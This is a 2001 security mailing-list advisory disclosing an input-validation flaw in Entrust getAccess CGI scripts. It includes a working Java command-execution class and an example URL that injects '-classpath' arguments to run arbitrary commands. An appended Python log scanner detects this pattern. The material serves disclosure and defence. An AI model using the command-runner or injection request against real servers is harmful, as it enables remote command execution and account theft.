From: "rudi carell"
To: vulnwatch@vulnwatch.org
Date: Mon, 30 Jul 2001 07:41:37
Subject: [VulnWatch] getAccess - Entrust
Mailing-List: contact vulnwatch-help@vulnwatch.org; run by ezmlm

hola listmembers,

getAccess[tm] is a single-sign-on system often used for large internet portals.

--- snip (http://www.entrust.com) ---
Entrust GetAccess[tm] offers the most comprehensive solution for consistently deploying and enforcing basic and enhanced security across online applications, from Web browsers, to enterprise applications and legacy database systems.
--- snip ---

Problem description:

Due to missing input validation it is possible to run (start) Java programs on the "getAccess" machine. Combined with publicly accessible uploads or any other way to create class files on the server, this vulnerability could be used to run arbitrary system commands on the target machine (or change getAccess parameters and steal any user account you want, BTW). It should also be possible (but not proven yet) to exploit default, install or demo classes shipped with Java or getAccess, which would make the file upload (creation) part unnecessary!
(uninstall.class is very likely an effective DoS.)

Example:

Find an exploitable getAccess class (one which accepts params!) or upload a "command" program:

--- cut here (example cmd.java) ---
import java.io.*;

public class cmd {
    public static void main(String args[]) {
        String s = null;  // current output line
        try {
            // runs args[0] with args[1] as its argument and relays stdout/stderr
            Process p = Runtime.getRuntime().exec(args[0] + " " + args[1]);
            BufferedReader stdInput = new BufferedReader(new InputStreamReader(p.getInputStream()));
            BufferedReader stdError = new BufferedReader(new InputStreamReader(p.getErrorStream()));
            // CGI header so the web server returns the output to the client
            System.out.println("Content-type: text/html\n\n");
            while ((s = stdInput.readLine()) != null) {
                System.out.println(s);
            }
            while ((s = stdError.readLine()) != null) {
                System.out.println(s);
            }
            System.exit(0);
        } catch (IOException e) {
            e.printStackTrace();
            System.exit(-1);
        }
    }
}
--- cut here ---

Later then, an HTTP request to:

http://hostname/sek-bin/login.gas.bat/x%20-classpath%20/whereever%20cmd%20/bin/ls%20-alsi

.. will run "/whereever/cmd.class" and execute "/bin/ls -alsi".

Summary:
object: *.gas.bat (all the getAccess CGI shell scripts)
class: input validation
remote: yes
vendor: has been informed with a separate e-mail (entrust@entrust.com - with no response until NOW)

(And BTW, I would NEVER EVER recommend using shell scripts for authentication purposes!)

nice day,
rC
rudicarell@hotmail.com
security@freefly.com
http://www.freefly.com/security/
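As an added detection example (not part of the original advisory or of getAccess), the following Python scans web-server access-log lines for requests to the *.gas.bat CGI scripts whose extra path info carries Java launcher options or whitespace-separated arguments, which is the pattern the request above depends on. The log lines, client addresses and the `/sek-bin/` prefix are constructed from the advisory's example.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines in Common Log Format (hypothetical clients).
SAMPLE_LOG = """\
10.0.0.5 - - [30/Jul/2001:07:41:37 +0000] "GET /sek-bin/login.gas.bat HTTP/1.0" 200 512
10.0.0.9 - - [30/Jul/2001:07:42:01 +0000] "GET /sek-bin/login.gas.bat/x%20-classpath%20/whereever%20cmd%20/bin/ls%20-alsi HTTP/1.0" 200 1024
10.0.0.5 - - [30/Jul/2001:07:42:30 +0000] "GET /sek-bin/login.gas.bat/extra HTTP/1.0" 200 512
10.0.0.7 - - [30/Jul/2001:07:43:00 +0000] "GET /images/logo.gif HTTP/1.0" 200 2048
"""

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+')
# Any getAccess CGI shell script, with optional extra path info after it.
GAS_RE = re.compile(r'^(/sek-bin/[^/]+\.gas\.bat)(/.*)?$', re.IGNORECASE)
# Java launcher options that redirect class loading or alter runtime settings.
JAVA_OPTS = ("-classpath", "-cp", "-jar", "-D")

def analyze_request(path):
    """Return a finding for a suspicious *.gas.bat request, or None."""
    m = GAS_RE.match(path)
    if not m:
        return None
    script, path_info = m.group(1), unquote(m.group(2) or "")
    # The script hands PATH_INFO to a shell, so split it on whitespace the same way.
    tokens = path_info.lstrip("/").split()
    reasons = []
    if any(t.startswith(JAVA_OPTS) for t in tokens):
        reasons.append("java launcher option in PATH_INFO")
    if len(tokens) > 1:
        reasons.append("whitespace-separated arguments in PATH_INFO")
    if not reasons:
        return None
    return {"script": script, "tokens": tokens, "reasons": reasons}

def scan_log(text):
    # Parse CLF lines and attach client, timestamp, method and status to each finding.
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        client, ts, method, path, status = m.groups()
        finding = analyze_request(path)
        if finding:
            finding.update(client=client, time=ts, method=method, status=int(status))
            findings.append(finding)
    return findings

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['client']} {f['script']} {f['tokens']} -> {'; '.join(f['reasons'])}")
```

A plain request to the script, or one whose extra path info is a single token, produces no finding; only argument injection into the shell wrapper is reported.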